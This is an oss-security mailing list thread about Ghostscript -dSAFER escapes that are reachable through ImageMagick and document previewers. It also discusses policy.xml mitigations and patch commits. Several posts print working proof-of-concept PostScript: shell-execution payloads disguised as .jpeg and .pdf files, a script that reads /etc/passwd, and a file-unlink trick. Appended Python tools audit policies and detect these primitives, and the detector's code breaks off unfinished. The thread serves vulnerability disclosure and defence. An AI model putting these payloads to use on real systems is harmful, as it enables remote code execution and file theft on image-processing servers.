Discussion:
More Ghostscript Issues: Should we disable PS coders in policy.xml by default?
Tavis Ormandy
2018-08-21 12:46:26 UTC
Hello, this was discussed on the distros list, but it was suggested to move
discussion to oss-security.

You might recall I posted a bunch of -dSAFER sandbox escapes in ghostscript
a few years ago:

http://seclists.org/oss-sec/2016/q4/29

I found a few file disclosure, shell command execution, memory corruption
and type confusion bugs. There was also one that was found exploited in the
wild <http://ghostbutt.com/>. There was also a similar widely exploited
issue <https://imagetragick.com/> that could be exploited identically.

TL;DR: I *strongly* suggest that distributions start disabling PS, EPS, PDF
and XPS coders in policy.xml by default.

$ convert input.jpg output.gif
uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

I've found a few more surprising ways to reach ghostscript recently, so
went back to look again and found a few more.

1. /invalidaccess checks stop working after a failed restore, so you can
just execute shell commands if you handle the error. Exploitation is very
trivial. Repro:

$ gs -q -sDEVICE=ppmraw -dSAFER -sOutputFile=/dev/null
GS>legal
GS>{ null restore } stopped { pop } if
GS>legal
GS>mark /OutputFile (%pipe%id) currentdevice putdeviceprops
GS<1>showpage
uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

(ImageMagick PoC at end of mail)

2. setcolor claims
<http://git.ghostscript.com/?p=ghostpdl.git;a=blob;f=psi/zcolor.c;h=4c0f25827e320ceaa9b510c98f9b1926532a26d5;hb=HEAD#l263>
no operand checking is necessary, because it's hidden behind a pseudo-operator
of the same name. That's true, but you can still call it indirectly via
setpattern, so type checking is necessary. Repro:

$ gs -q -sDEVICE=ppmraw -dSAFER
GS><< /Whatever 16#414141414141 >> setpattern
Segmentation fault

3. The LockDistillerParams boolean isn't type checked, so nice easy type
confusion. Repro:

$ gs -q -sDEVICE=ppmraw -dSAFER
GS><< /LockDistillerParams 16#4141414141414141 >> .setdistillerparams
Segmentation fault


4. .tempfile permissions don't seem to work, I don't know when they broke.
You're not supposed to be able to open files outside of the patterns in
the PermitFileReading array, but that doesn't seem to work for me e.g.:
$ strace -fefile gs -sDEVICE=ppmraw -dSAFER
...
GS>(/proc/self/cwd/hello) (w) .tempfile
open("/proc/self/cwd/hello26E8LQ", O_RDWR|O_CREAT|O_EXCL, 0600) = 3
GS<2>dup
GS<3>(hello) writestring
GS<2>closefile

This means you can create a file in any directory (I don't think you can
prevent the random suffix). Additionally, I have a trick to let you read
and unlink any file you have permission to.

Here is how to unlink() any file:

$ strace -fefile gs -sDEVICE=ppmraw -dSAFER
...
GS>{ .bindnow } stopped {} if
GS>(/etc/passwd) [] .tempfile
GS<2>.quit
unlink("/etc/passwd") = -1 EACCES (Permission denied)
+++ exited with 0 +++

Reading is more complicated, because the best way I know how to do it is to
interpret a file as PostScript and catch the syntax errors. Here is an
example:

$ cat fileread.ps
/FileToSteal (/etc/passwd) def
errordict /undefinedfilename {
FileToSteal % save the undefined name
} put
errordict /undefined {
(STOLEN: ) print
counttomark {
==only
} repeat
(\n) print
FileToSteal
} put
errordict /invalidfileaccess {
pop
} put
errordict /typecheck {
pop
} put
FileToSteal (w) .tempfile
statusdict
begin
1 1 .setpagesize
end
quit
$ gs -q -sDEVICE=ppmraw -dSAFER fileread.ps
GPL Ghostscript 9.23:
STOLEN: root:x:0:0:root:
STOLEN: daemon:x:1:1:daemon:/bash/bin/root:(/etc/passwd)
STOLEN: bin:x:2:2:bin:/nologin/sbin/usr/sbin:/usr(/etc/passwd)
STOLEN: sys:x:3:3:sys:/nologin/sbin/usr/bin:(/etc/passwd)
STOLEN: sync:x:4:65534:sync:/nologin/sbin/usr/dev:(/etc/passwd)
STOLEN: games:x:5:60:games:/sync/bin/bin:(/etc/passwd)

This can be used to steal arbitrary files from webservers that use
ImageMagick by encoding file contents into the image output, see my
previous PoC here <http://www.openwall.com/lists/oss-security/2016/09/29/3> for
an example, i.e. you can make "convert malicious.jpg thumbnail.jpg" produce
an image with the contents of a file visible.

These bugs were found manually, I also wrote a fuzzer and I'm working on
minimizing a very large number of testcases that I'm planning to report
over the next few days. I will just file those issues upstream and not post
each individual one here, you can monitor https://bugs.ghostscript.com/ if
you want to. I expect there to be several dozen unique bugs.

In the meantime, I really *strongly* suggest that distributions start
disabling PS, EPS, PDF and XPS coders in policy.xml by default. I think
this is the number one "unexpected ghostscript" vector, imho this should
happen asap. IMHO, -dSAFER is a fragile security boundary at the moment,
and executing untrusted postscript should be discouraged, at least by
default.

Please note, ImageMagick sends some initialization commands to ghostscript
that break my minimal PoC, but you can just undo their changes in
PostScript.

This one works for me on the version in Ubuntu:
$ cat shellexec.jpeg
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
$ convert shellexec.jpeg whatever.gif
uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

For CentOS, try this:

$ cat shellexec.jpeg
%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
$ convert shellexec.jpeg whatever.gif
uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

Thanks, Tavis.
Tavis Ormandy
2018-08-21 14:48:22 UTC
Post by Tavis Ormandy
$ convert input.jpg output.gif
uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
My colleague Jann Horn pointed out evince (which uses libgs, which is
affected with some tweaks to the PoC) is used to generate previews in
Nautilus, which means previews can trigger code execution (see
/usr/share/thumbnailers/evince.thumbnailer). I think it's possible to
trigger that via file automatic download in a browser just by visiting a
URL, but I haven't tested it.

I think those thumbnails should be disabled, but you've probably noticed I
think everything related to untrusted ghostscript should be disabled :-)

Tavis.
Bob Friesenhahn
2018-08-21 15:00:26 UTC
Post by Tavis Ormandy
I think those thumbnails should be disabled, but you've probably noticed I
think everything related to untrusted ghostscript should be disabled :-)
I have posted to the GraphicsMagick Announcements mailing list
regarding your findings (with a link to this list) and suggested that
a fool-proof solution is that Ghostscript should be uninstalled.

Uninstalling Ghostscript entirely might cause software using libgs to
not execute at all unless a stub library is put in its place.

Dependencies on Ghostscript are much larger than one would initially
think due to Postscript being the traditional output from Unix
software for "printing" and thus it is used as an intermediate format
in order to convert between formats. EPS content is also embedded in
some other formats.

Bob
--
Bob Friesenhahn
***@simple.dallas.tx.us, http://www.simplesystems.org/users/bfriesen/
GraphicsMagick Maintainer, http://www.GraphicsMagick.org/
Alex Gaynor
2018-08-21 15:21:15 UTC
A small note. Both ImageMagick and GraphicsMagick process various file
formats that can nest a different image file inside of them. These are very
frequently implemented with a call to ReadImage(), with no checking that
it's the expected file format. (As a result, the fuzzer finds various
impressive chains, with sometimes 3 different image formats nested inside
of each other).

The conclusion of this is that people _must not_ attempt to do their own
format detection and then pass the data to IM/GM, because this can be
bypassed with nested formats. It's imperative that GS truly be disabled,
either with policy.xml or by uninstalling GS.

Alex

--
All that is necessary for evil to succeed is for good people to do nothing.
Tavis Ormandy
2018-08-21 20:12:43 UTC
Thanks Alex.

FWIW, not all of these are visible, but I've started filing bugs, I'll file
a few more today and then let the developers work through the most serious
ones.

699654 /invalidaccess checks stop working after a failed restore
699655 missing type checking in setcolor
699656 LockDistillerParams boolean missing type checks
699659 missing type check in type checker (!)
699657 .tempfile SAFER restrictions seem to be broken
699658 Bypassing PermitFileReading by handling undefinedfilename error
699660 shading_param incomplete type checking
699661 pdf14 garbage collection memory corruption
699662 calling .bindnow causes sideeffects
699663 .setdistillerkeys memory corruption
699664 corrupt device object after error in job

I'm working on getting reproducers working for the developers for all bugs.
AmitB
2018-08-22 18:09:12 UTC
I also took a look a couple of weeks ago at a few of the patches for your
previous bugs from 2 years ago, and found that one of them is incomplete
and still allows RCE (https://bugs.ghostscript.com/show_bug.cgi?id=697178).

POC:
------------------
$ cat poc.jpg
%!PS
<< (ICCProfilesDir) (%pipe%id > /dev/) >> .setuserparams
currentdevice null true mark /OutputICCProfile (tty)
.putdeviceparams
showpage
$ identify poc.jpg
uid=1000(amit) gid=1000(amit) groups=1000(amit)

After reviewing all of the comments in the original bug report I saw that
you actually mentioned this issue, but it was not taken under
consideration/forgotten for some reason.
So effectively a public RCE PoC has been available for GhostScript for
almost 2 years.

I opened a report two weeks ago at bugs.ghostscript.com:
699623 Incomplete fix for #697178 Allowing -dSAFER bypass

But I got no response from them until today.
If you have other channels of contact with them, please let them know about
this one too.
Bob Friesenhahn
2018-08-22 21:16:34 UTC
The CERT advisory at https://www.kb.cert.org/vuls/id/332928 provides a
policy.xml example which does not appear to block PS2 and PS3, which
are also entry points for reading Postscript.

Bob
--
Bob Friesenhahn
***@simple.dallas.tx.us, http://www.simplesystems.org/users/bfriesen/
GraphicsMagick Maintainer, http://www.GraphicsMagick.org/
Tavis Ormandy
2018-08-23 03:33:37 UTC
On Wed, Aug 22, 2018 at 2:17 PM Bob Friesenhahn <
Post by Bob Friesenhahn
The CERT advisory at https://www.kb.cert.org/vuls/id/332928 provides a
policy.xml example which does not appear to block PS2 and PS3, which
are also entry points for reading Postscript.
I think (luckily) there's no magic that will invoke those, but I think
you're right, for completeness they should be disabled by default as well.

Tavis.
Leonardo Taccari
2018-08-22 21:36:44 UTC
Hello Bob,
Post by Bob Friesenhahn
The CERT advisory at https://www.kb.cert.org/vuls/id/332928 provides a
policy.xml example which does not appear to block PS2 and PS3, which
are also entry points for reading Postscript.
[...]
If I am not missing something I think that ghostscript isn't used
for them though.
Mateusz Lenik
2018-08-23 11:29:23 UTC
Hello,
Post by Leonardo Taccari
Post by Bob Friesenhahn
The CERT advisory at https://www.kb.cert.org/vuls/id/332928 provides a
policy.xml example which does not appear to block PS2 and PS3, which
are also entry points for reading Postscript.
[...]
If I am not missing something I think that ghostscript isn't used
for them though.
It seems to be possible to disable GhostScript in ImageMagick completely by
the policy rule below. It's not possible to miss any format with it.

<policy domain="delegate" rights="none" pattern="gs" />

I also found out that Amit's exploit works with the lesspipe that ships with
less by default -- it uses gs via the ps2ascii wrapper.

Best,
Mateusz
Leonardo Taccari
2018-08-23 12:44:40 UTC
Hello Mateusz,
Post by Mateusz Lenik
[...]
It seems to be possible to disable GhostScript in ImageMagick completely by
the policy rule below. It's not possible to miss any format with it.
<policy domain="delegate" rights="none" pattern="gs" />
[...]
Please note that this will work *only* when ImageMagick is built
with `--without-gslib'. In that case ImageMagick is not linked
against gslib and ghostscript is directly invoked via `gs' or
similar.

If ImageMagick was built `--with-gslib' then no `gs' is invoked
and there is no delegation, so the problems described by Tavis can
be reproduced with that delegate policy rule as well.


It is probably safer to follow the workaround described in:
<https://www.kb.cert.org/vuls/id/332928>
Bob Friesenhahn
2018-08-23 12:58:51 UTC
Post by Leonardo Taccari
Hello Bob,
Post by Bob Friesenhahn
The CERT advisory at https://www.kb.cert.org/vuls/id/332928 provides a
policy.xml example which does not appear to block PS2 and PS3, which
are also entry points for reading Postscript.
[...]
If I am not missing something I think that ghostscript isn't used
for them though.
You are missing something. While they are unlikely to be triggered by
default (but still could be triggered by an attacker with sufficient
control), testing shows that

convert -verbose PS2:file.ps outfile.png
convert -verbose file.ps2 outfile.png
convert -verbose PS3:file.ps outfile.png
convert -verbose file.ps3 outfile.png

does in fact invoke Ghostscript.

Bob
--
Bob Friesenhahn
***@simple.dallas.tx.us, http://www.simplesystems.org/users/bfriesen/
GraphicsMagick Maintainer, http://www.GraphicsMagick.org/
Leonardo Taccari
2018-08-23 13:33:33 UTC
Hello Bob,
Post by Bob Friesenhahn
You are missing something. While they are unlikely to be triggered by
default (but still could be triggered by an attacker with sufficient
control), testing shows that
convert -verbose PS2:file.ps outfile.png
convert -verbose file.ps2 outfile.png
convert -verbose PS3:file.ps outfile.png
convert -verbose file.ps3 outfile.png
does in fact invoke Ghostscript.
Whoops, I stand corrected, sorry for the incorrect information!
(At least when invoking them with the `PS2:' or `PS3:' prefixes,
anyway; yes, both PS2 and PS3 policy rules are worth adding
as well.)

(Regarding the `file.ps2' and `file.ps3' examples without `PS2:' or
`PS3:' prefixes: according to `convert -debug Policy -log "%e"' it seems
that they end up as:

Domain: Coder; rights=Read; pattern="PS" ...

...so should be blocked by the workaround described in
VU#332928. But please correct me if I'm wrong.)

JFTR, not related to PS2 and PS3 but also a possible ghostscript
consumer: EPT seems to end up as `pattern="PS"' too (unlike PS2
and PS3).


Thank you!
Bob Friesenhahn
2018-08-23 15:03:40 UTC
Post by Leonardo Taccari
(Regarding the `file.ps2' and `file.ps3' examples without `PS2:' or
`PS3:' prefixes according `convert -debug Policy -log "%e"' it seems
Domain: Coder; rights=Read; pattern="PS" ...
...so should be blocked by the workaround described in
VU#332928. But please correct me if I'm wrong.)
This is likely due to header magic detection (e.g. "%!PS-Adobe"). It
is possible that a different path will be taken if the common
Postscript header is not detected. The file extension may then be
used as a hint. Also, there is a wide variety of ImageMagick
versions in use, with a wide variety of behaviors.

The version of ImageMagick provided by the Ubuntu Linux I am using at
this moment dates from 2012!

Bob
--
Bob Friesenhahn
***@simple.dallas.tx.us, http://www.simplesystems.org/users/bfriesen/
GraphicsMagick Maintainer, http://www.GraphicsMagick.org/
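An added audit script (not code from this thread, from ImageMagick or from Ghostscript) that parses a policy.xml and reports which of the Ghostscript-reaching coders named above (PS, EPS, PDF, XPS from the original mail, PS2 and PS3 from Bob's test, EPT from Leonardo's note) are still readable, and whether the "gs" delegate rule from Mateusz's post is present. The matching semantics are assumptions: shell-style globs with {a,b} alternation, the last matching rule wins, and rights are a "|"- or ","-separated list; the two policy documents are constructed samples.

```python
"""Audit an ImageMagick policy.xml for coders that still reach Ghostscript.

Added example, not code from the thread or from ImageMagick. Matching
semantics (globs with {a,b} alternation, last matching rule wins, rights as
a '|'/',' list) are assumptions, not a copy of ImageMagick's policy parser.
"""
import re
import xml.etree.ElementTree as ET
from fnmatch import fnmatchcase

# Coders the thread identifies as ending up in Ghostscript.
GS_CODERS = ("PS", "PS2", "PS3", "EPS", "PDF", "XPS", "EPT")

# Constructed sample: only the four coders from the original mail are blocked,
# which is the gap Bob and Leonardo point out later in the thread.
WEAK_POLICY = """<?xml version="1.0" encoding="UTF-8"?>
<policymap>
  <policy domain="coder" rights="none" pattern="PS" />
  <policy domain="coder" rights="none" pattern="EPS" />
  <policy domain="coder" rights="none" pattern="PDF" />
  <policy domain="coder" rights="none" pattern="XPS" />
</policymap>
"""

# Constructed sample: every Ghostscript-reaching coder plus the delegate rule.
# The delegate rule only helps builds made --without-gslib (Leonardo's caveat),
# so the coder rules are the part that must not be missing.
HARDENED_POLICY = """<?xml version="1.0" encoding="UTF-8"?>
<policymap>
  <policy domain="coder" rights="none" pattern="{PS,PS2,PS3,EPS,PDF,XPS,EPT}" />
  <policy domain="delegate" rights="none" pattern="gs" />
</policymap>
"""


def _expand_braces(pattern):
    """Expand {a,b,c} alternation (nested groups included) into plain globs."""
    m = re.search(r"\{([^{}]*)\}", pattern)
    if m is None:
        return [pattern]
    head, tail = pattern[:m.start()], pattern[m.end():]
    expanded = []
    for alt in m.group(1).split(","):
        expanded.extend(_expand_braces(head + alt.strip() + tail))
    return expanded


def _matches(name, pattern):
    """Case-insensitive glob match of a coder/delegate name against a rule pattern."""
    return any(fnmatchcase(name.upper(), p.upper()) for p in _expand_braces(pattern))


def _rules(policy_xml, domain):
    """Yield (pattern, rights-set) for every <policy> of the domain, in file order."""
    root = ET.fromstring(policy_xml)
    for p in root.iter("policy"):
        if p.get("domain", "").lower() != domain:
            continue
        rights = {r.strip().lower() for r in re.split(r"[|,]", p.get("rights", ""))}
        yield p.get("pattern", ""), rights


def authorized(policy_xml, domain, name, right):
    """True if `right` on `name` is still allowed: no matching rule means allowed,
    otherwise the last matching rule decides and rights="none" grants nothing."""
    allowed = True
    for pattern, rights in _rules(policy_xml, domain):
        if _matches(name, pattern):
            allowed = right in rights
    return allowed


def unblocked_gs_coders(policy_xml):
    """Ghostscript-reaching coders ImageMagick may still read under this policy."""
    return [c for c in GS_CODERS if authorized(policy_xml, "coder", c, "read")]


def delegate_gs_blocked(policy_xml):
    """True if the policy forbids executing the external 'gs' delegate."""
    return not authorized(policy_xml, "delegate", "gs", "execute")


if __name__ == "__main__":
    import sys
    # Audit a real policy.xml if a path is given, otherwise the two samples.
    if len(sys.argv) > 1:
        with open(sys.argv[1]) as fh:
            targets = [(sys.argv[1], fh.read())]
    else:
        targets = [("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)]
    for label, xml_text in targets:
        print(f"{label}: still readable {unblocked_gs_coders(xml_text)}, "
              f"gs delegate blocked: {delegate_gs_blocked(xml_text)}")
```

Run it against /etc/ImageMagick-6/policy.xml (or wherever "convert -list policy" says the file lives) to see which of the thread's coders a distribution policy leaves open.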
Tavis Ormandy
2018-08-27 23:02:46 UTC
Here is an update, Artifex made a press release
<https://www.darkreading.com/prnewswire2.asp?rkey=20180824UN89145&filter=3930>
listing some necessary commits, but the list was incomplete.

Here is a list of relevant commits I'm aware of so far, some issues are
still open with working exploits available. It's my understanding that no
new release is planned until late September, and vendors need to either
ship a git snapshot when all issues are resolved, or apply patches. I have
testcases for each problem, but I think the bugs will be visible eventually
so I'm not posting them here.

http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=ea735ba37dc0fd5f5622d031830b9a559dec1cc9
# 699671 handling /undefined results in SEGV
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0edd3d6c63
# 699659 missing type check in ztype
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=78911a01b6
# 699654 A /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=5516c614dc33
# 699654 B /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=79cccf641486
# 699654 C /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=b326a716
# 699655 - missing type checking in setcolor
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=c3476dde
# 699656 - LockDistillerParams boolean missing type checks
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=a054156d42
# 699658 - Bypassing PermitFileReading by handling undefinedfilename errors
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0b6cd1918e1ec4ffd087400a754a845180a4522b
# 699660 - shading_param incomplete type checking
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=e01e77a36cbb2e0277bc3a63852244bec41be0f6
# 699660 - shading_param incomplete type checking
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=c432131c3f
# 699661 - pdf14 garbage collection memory corruption
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=971472c83a345a16dac9f90f91258bb22dd77f22
# 699663 - .setdistillerkeys memory corruption
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=241d911127
# 699664 - corrupt device object after error in job
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0d3901189f
# 699657 - .tempfile SAFER restrictions seem to be broken
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=8e9ce5016db968b40e4ec255a3005f2786cce45f
# 699665 - memory corruption in aesdecode
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=b575e1ec42
# 699668 - .definemodifiedfont memory corruption if /typecheck is handled

Tavis

Perry E. Metzger
2018-08-27 23:43:51 UTC
Post by Tavis Ormandy
Here is an update, Artifex made a press release
<https://www.darkreading.com/prnewswire2.asp?rkey=20180824UN89145&filter=3930>
listing
some necessary commits, but the list was incomplete.
They also claimed "Artifex Software is pleased to report that the
recently disclosed security vulnerabilities in Ghostscript have been
resolved.", which, even if they were all patched in their git
repository, which they don't seem to all be, would still not really
be true given the lack of an actual release.
Post by Tavis Ormandy
Here is a list of relevant commits I'm aware of so far, some issues
are still open with working exploits available. It's my
understanding that no new release is planned until late September,
and vendors need to either ship a git snapshot when all issues are
resolved, or apply patches. I have testcases for each problem, but
I think the bugs will be visible eventually so I'm not posting them
here.
If someone would put a git repo onto GitHub with all the available
patches applied on a branch, I'm sure a bunch of people would be
grateful.

Perry
--
Perry E. Metzger ***@piermont.com
Marcus Meissner
2018-08-28 09:25:17 UTC
Hi,

I had 4 CVEs assigned yesterday afternoon, already working from CERT's list;
see inline comments below. Please adjust if something is incorrect in them.

CERT has mailed overnight that they will take care of the CVE assignment, so
I am deferring the rest to them.

Ciao, Marcus
Post by Tavis Ormandy
Here is an update, Artifex made a press release
<https://www.darkreading.com/prnewswire2.asp?rkey=20180824UN89145&filter=3930>
listing
some necessary commits, but the list was incomplete.
Here is a list of relevant commits I'm aware of so far, some issues are
still open with working exploits available. It's my understanding that no
new release is planned until late September, and vendors need to either
ship a git snapshot when all issues are resolved, or apply patches. I have
testcases for each problem, but I think the bugs will be visible eventually
so I'm not posting them here.
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=ea735ba37dc0fd5f5622d031830b9a559dec1cc9
# 699671
handling /undefined results in SEGV
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0edd3d6c63
# 699659 missing type check in ztype
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=78911a01b6 #
699654 A /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=5516c614dc33 #
699654 B /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=79cccf641486 #
699654 C /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=b326a716 # 699655
- missing type checking in setcolor
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=c3476dde # 699656
- LockDistillerParams boolean missing type checks
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=a054156d42
CVE-2018-15910
Post by Tavis Ormandy
# 699658 - Bypassing PermitFileReading by handling undefinedfilename errors
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0b6cd1918e1ec4ffd087400a754a845180a4522b
# 699660 - shading_param incomplete type checking
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=e01e77a36cbb2e0277bc3a63852244bec41be0f6
# 699660 - shading_param incomplete type checking
CVE-2018-15909
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=c432131c3f
# 699661 - pdf14 garbage collection memory corruption
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=971472c83a345a16dac9f90f91258bb22dd77f22
# 699663 - .setdistillerkeys memory corruption
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=241d911127
# 699664 - corrupt device object after error in job
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0d3901189f
# 699657 - .tempfile SAFER restrictions seem to be broken
CVE-2018-15908
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=8e9ce5016db968b40e4ec255a3005f2786cce45f
# 699665 - memory corruption in aesdecode
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=b575e1ec42
CVE-2018-15911
Post by Tavis Ormandy
# 699668 - .definemodifiedfont memory corruption if /typecheck is handled
Tavis
On Thu, Aug 23, 2018 at 8:05 AM Bob Friesenhahn <
Post by Bob Friesenhahn
Post by Leonardo Taccari
(Regarding the `file.ps2' and `file.ps3' examples without `PS2:' or
`PS3:' prefixes according `convert -debug Policy -log "%e"' it seems
Domain: Coder; rights=Read; pattern="PS" ...
...so should be blocked by the workaround described in
VU#332928. But please correct me if I'm wrong.)
This is likely due to header magic detection (e.g. "%!PS-Adobe"). It
is possible that a different path will be taken if the common
Postscript header is not detected. The file extension may then be
used as a hint. Also, there are a wide varieties of ImageMagick
versions in use, with a wide variety of behaviors.
The version of ImageMagick provided by the Ubuntu Linux I am using at
this moment dates from 2012!
Bob
--
Bob Friesenhahn
GraphicsMagick Maintainer, http://www.GraphicsMagick.org/
--
Marcus Meissner,SUSE LINUX GmbH; Maxfeldstrasse 5; D-90409 Nuernberg; Zi. 3.1-33,+49-911-740 53-432,,serv=loki,mail=wotan,type=real <***@suse.de>
Tavis Ormandy
2018-08-29 20:14:41 UTC
Thanks Marcus, here are some more necessary commits:

http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=520bb0ea7519aa3e79db78aaf0589dae02103764
# 699654 D /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=5b5536fa88a9e885032bc0df3852c3439399a5c0
# 699670 gssetresolution memory corruption
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=ea735ba37dc0fd5f5622d031830b9a559dec1cc9
# 699671 handling /undefined results in SEGV
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=ea735ba37dc0fd5f5622d031830b9a559dec1cc9
# 699676 PDF interpreter can leave dangerous operators available

Please note that not all issues are resolved, and I have exploits that
still work against HEAD.

For example, this will still work if you pull master as of this writing:

$ cat testcase.pdf
%!PS
% This is ghostscript bug #699687 (split out from bug #699654)

a0 % just select a papersize to initialize page device

% You can't def HWResolution (for example), because currentpagedevice is readonly:
%
% GS>currentpagedevice wcheck ==
% false
%
% But you can just put or astore into it, because the array itself is writable:
% GS>currentpagedevice /HWResolution get wcheck ==
% true
%
% If you put some junk in there, then grestore stops working.
currentpagedevice /HWResolution get 0 (foobar) put

% this grestore will fail, `stopped` just handles the error instead of
aborting.
{ grestore } stopped {} if

% now LockSafetyParams will be incorrectly unset, you can check like this:
% GS>mark currentdevice getdeviceprops .dicttomark /.LockSafetyParams get
== pop
% false

% we can change and configure devices now, so make sure we're using one with
% a OutputFile property.
(ppmraw) selectdevice

% run a shell command
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
showpage
$ evince testcase.pdf
uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
(libspectre) ghostscript reports: ioerror -12

Tavis.
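Tavis's testcase above chains four primitives: an error swallowed with `stopped` around a (g)restore, a device switch with `selectdevice`, an `/OutputFile` rewrite through `putdeviceprops`, and the `%pipe%` device that turns the output path into a shell command. The following is an added example, not part of the thread and not Ghostscript code: a heuristic scanner that strips PostScript comments while tracking string nesting (so `(%pipe%id)` inside a string is not mistaken for a comment, and a comment that merely mentions `LockSafetyParams` does not fire) and reports which of those primitives appear in the executable part of an input. The rule names and the three sample inputs are this example's own; the first sample mirrors the executable lines of the testcase, the second is a constructed variant that swallows a failed `restore` instead of `grestore`. It is a triage aid for a mail gateway or upload handler, not a substitute for patching Ghostscript or for disabling the coders in policy.xml.

```python
"""Heuristic scanner for the PostScript primitives used by the -dSAFER
escapes discussed in this thread.

Added example; not code from the thread or from Ghostscript.  Rule names and
sample inputs are constructed for this example.
"""
import re

# (finding name, pattern) pairs, applied to code with comments removed.
RULES = [
    # the %pipe% device: the output "file" becomes a shell command line
    ("pipe_device", re.compile(r"%pipe%", re.IGNORECASE)),
    # rewriting OutputFile on the current device via a device-param operator
    ("outputfile_override",
     re.compile(r"/OutputFile\b[^\n]*\b(putdeviceprops|setpagedevice|setdevice)\b")),
    # an error from (g)restore handled with `stopped` instead of aborting:
    # the sequence that leaves /invalidaccess checks or LockSafetyParams unset
    ("stopped_restore",
     re.compile(r"\{[^}]*\b(g?restore)\b[^}]*\}\s*stopped")),
    # touching or probing the safety flag by name
    ("locksafety_probe", re.compile(r"\.?LockSafetyParams\b")),
    # switching devices after interpreter state has been corrupted
    ("selectdevice", re.compile(r"\bselectdevice\b")),
]

# Constructed sample mirroring the executable lines of the testcase above;
# the comment line must not produce a finding.
TESTCASE = """%!PS
a0
currentpagedevice /HWResolution get 0 (foobar) put
{ grestore } stopped {} if
% .LockSafetyParams is now unset (comment only, must not fire)
(ppmraw) selectdevice
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
showpage
"""

# Constructed variant: a failed `restore` swallowed the same way.
SWALLOWED_RESTORE = """%!PS
/s save def
{ s restore } stopped { pop } if
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
showpage
"""

# Constructed benign page; %pipe% appears only inside a comment.
BENIGN = """%!PS-Adobe-3.0
% the token %pipe% in a comment is not a finding
/Helvetica findfont 12 scalefont setfont
72 720 moveto (Hello (nested) world) show
showpage
"""


def strip_comments(src):
    """Remove '%' comments but keep string contents.

    PostScript strings are delimited by balanced parentheses and may contain
    '%', so a '%' only starts a comment when we are not inside a string.
    Backslash escapes inside strings are copied through unchanged.
    """
    out = []
    depth = 0
    i = 0
    n = len(src)
    while i < n:
        ch = src[i]
        if depth == 0 and ch == "%":
            j = src.find("\n", i)          # drop to end of line, keep newline
            i = n if j == -1 else j
            continue
        if depth > 0 and ch == "\\":
            out.append(src[i:i + 2])
            i += 2
            continue
        if ch == "(":
            depth += 1
        elif ch == ")" and depth > 0:
            depth -= 1
        out.append(ch)
        i += 1
    return "".join(out)


def scan(src):
    """Return the sorted finding names that fire on the code of an input."""
    code = strip_comments(src)
    return sorted(name for name, rx in RULES if rx.search(code))


def is_suspicious(src):
    """Flag %pipe% on its own, or the error-swallow plus OutputFile combination."""
    found = set(scan(src))
    return "pipe_device" in found or {"stopped_restore", "outputfile_override"} <= found


if __name__ == "__main__":
    for label, sample in (("testcase", TESTCASE),
                          ("swallowed restore", SWALLOWED_RESTORE),
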